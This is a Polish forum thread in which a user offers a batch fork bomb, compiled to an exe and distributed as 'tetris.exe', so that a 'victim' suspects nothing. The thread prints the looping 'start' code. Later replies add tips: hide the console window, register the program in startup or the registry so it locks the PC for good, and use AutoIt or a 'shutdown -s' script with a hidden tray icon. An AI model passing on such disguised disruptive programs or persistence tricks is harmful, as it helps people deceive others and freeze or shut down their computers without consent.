Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Mały program a wiele potrafi

mRsas

Rekomendowane odpowiedzi

Opublikowano

Witam dziś chciał bym w wasze ręce oddać program który uruchamia tabele cmd jak ja to nazywam ale w dużej ilości co powoduję to że komputer po 10-20 sek zawiesza się program jest w pliku exe więc ofiara nic nie będzie podejrzewać

Sam program to tylko kilka liter ale jest on nie w .bat ale w exe

Jedyna wada tego programu to mała pojemność przez co ofiara bardziej załapana może się czegoś domyślić

:start

start

goto start

tak wygląda serce programu

Uwaga używacie i rozsyłacie to na własną odpowiedzialność

link http://www.speedysha...8Dz7/tetris.exe

skan: bjli8x.png

https://www.virustotal.com/url/a61f9fbc33085f9594aa4fe62dad4a97b77750edae96161527a855eb4d86588a/analysis/1348912785/ skan by wilk2312

Nie zezwalam na umieszczanie tego na innym forum

Opublikowano

Ktoś przetestował ?;p

tak ja na swoim komputerze przy procesorze i5-2500k i 8 gb ram komputer padł całkowicie po 30 sek
Opublikowano

Właściwie to nie ma sensu, bo wystarczy reset PC i juz jest wszystko ok, a osoba której to przesłałeś nie bedzie sie do ciebie odzywać. :P

A co do rozmiaru - nie problem dać kilka-set linijek np. :123 ;)

To jest coś typu:

start %0
goto start

??

Jeżeli tak, to użyj komplikatora z funkcją ukrywania w tle - bez konsolki CMD, bo tak to sie da wyłączyć raz dwa ;)

897771404427433574016.png

Opublikowano

Właściwie to nie ma sensu, bo wystarczy reset PC i juz jest wszystko ok, a osoba której to przesłałeś nie bedzie sie do ciebie odzywać. :P

A co do rozmiaru - nie problem dać kilka-set linijek np. :123 ;)

To jest coś typu:

start %0
goto start

??

Jeżeli tak, to użyj komplikatora z funkcją ukrywania w tle - bez konsolki CMD, bo tak to sie da wyłączyć raz dwa ;)

Tak to jest dokładnie to a tu masz reakcje kolegi

[2012-09-28 23:31:08] *****: kutasie

[2012-09-28 23:31:14] *****L: ale zajebiste to

[2012-09-28 23:31:19] *****: ;)

[2012-09-28 23:31:22] *****: z kąd to masz ?

[2012-09-28 23:31:27] *****: napisałem

[2012-09-28 23:31:40] *****L: zajebiste

[2012-09-28 23:31:54] *****L: naucz mnie mistrzu

Opublikowano
Opublikowano

po cholere odświeżasz to gówno? Mały program i gówno potrafi, nie ma sensu tego ciągnąć, tylko podstawówka się tym jara

Kolego a co cię to interesuję zrobiłem coś to teraz to reklamuję ponieważ na yt widziałem to jak to ty mówisz gówno tylko w formie bat a czasem można komuś zrobić taki żart i faktycznie widzę ze od 5 lat siedzę w podstawówce wgl twojej teorii

Opublikowano

denerwuje mnie to tak samo jak odświeżanie tematów ze spambotami i innymi pierdołami. Na co ty liczysz? Że ktoś ci napisze że to zajebiste i wkurwił matke, ojca i wszytkich wujków, czy co?! Tu nawet nie ma o czym dyskutować. No może poza tym komu więcej okienek najebało...

Opublikowano

To miałoby sens, gdybyś kompa zablokował na stałe, np. dodał wpis do rejestru który uruchamia ten program w startup'ie.

Tak to może służyć jedynie dla szpanu.

Potrzebujesz strony internetowej? Pisz śmiało, jestem do waszej dyspozycji. (Jedyna możliwość zapłaty to pieniądze (przelew, SMS, doładowanie), innej nie przyjmuje i nawet nie masz co pisać).

Opublikowano

cexxus jest to program który ma jedynie kogoś zirytować a nie blokować mu komputer ale widzę że nie podoba się więc proszę o zamknięcie i przeniesienie do kosza albo czegoś

Opublikowano

Nie żeby co ale widze że osoby takie jak "@Sopelek997" Potrafią jedynie powyzywać kogoś niż ocenić jego prace jeśli zaczynasz temat w takim temacie to pisz o tym co w nim jest a nie o tym czego w nim nie ma za to powinieneś dostać warna za spam a nie tak sobie piszesz -.-

Wedłóg mnie ten program to super zabawka by po wkr***ać znajomych dziś zrobie kawał kumplowi xD albo i nawet zaraz zobaczymy jaka reakcja ^^

beznazwy239.png

Opublikowano
Nie żeby co ale widze że osoby takie jak "@Sopelek997" Potrafią jedynie powyzywać kogoś niż ocenić jego prace

Oceniłem przecież. Napisałem, że to jest gówno, więc o co ci chodzi?

• 2 tygodnie później...
Opublikowano
Tak to jest dokładnie to

W takim razie nie ty to stworzyłeś...

To się tak naprawdę nazywa Fork Bomb (Rozwidlająca się bobma)

Wyłączyć to można zwykłym: Zamknij wszystkie okna. :)

Bardzo słabe... mój PC miał kilkaset tego otwartego, explorer.exe już piszczał, a ja ani 1 laga nie miałem.

Jednym słowem cienkie :)

897771404427433574016.png

Opublikowano

to nic nie da, trzeba mieć kompa 10 letniego żeby zadziałało, mało przyszłościowy jest ten skrypt, w batch można o wiele więcej urworzyć, prawdziwe zawiechy lub myszka w rogu ekranu itp a nie jakiś badziew : )

Opublikowano

to nic nie da, trzeba mieć kompa 10 letniego żeby zadziałało, mało przyszłościowy jest ten skrypt, w batch można o wiele więcej urworzyć, prawdziwe zawiechy lub myszka w rogu ekranu itp a nie jakiś badziew : )

Y nie kolego mam procka i5-2500k karta gtx 560 ti komputer 10 -30 sek nic nie można zrobić bo się zawiesza

Opublikowano

lol, mi 5 letniego kompa nawet nie zwiesił o_O, tylko explorer krzyczy że dużo procesów i tyle ;o

• 3 tygodnie później...
Opublikowano

I co to daje juz w autoicie lepiej napisac shutdown(1) i komp gasnie ;/ i dodac skrypt do zapisu w progrmach z startu i pozamiatane;p

+ notrayicon niewidoczna ikonka i mamy to samo tylko uruchamia sie ze startem systemu :P

Każdy krok w przód to o jeden mniej !

Opublikowano

I co to daje juz w autoicie lepiej napisac shutdown(1) i komp gasnie ;/ i dodac skrypt do zapisu w progrmach z startu i pozamiatane;p

+ notrayicon niewidoczna ikonka i mamy to samo tylko uruchamia sie ze startem systemu :P

Albo w assembly ominąć kernela i popalić hardware.

Opublikowano

Albo w assembly ominąć kernela i popalić hardware.

Myślisz, że speec'e od batch'a sobie poradzą?

Już lepiej:

@echo off
shutdown -s

Niż w guwnoicie

Opublikowano

Nie wiem po co wy tu wchodzicie jak wam się nie podoba.

Jak chcecie już dać negatywna ocene to dajcie jakiś kod do programu ktory ma lepsze dzialanie i niech ten co napisał ten temat niech się uczy,

Każdy kiedy zaczynał...

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...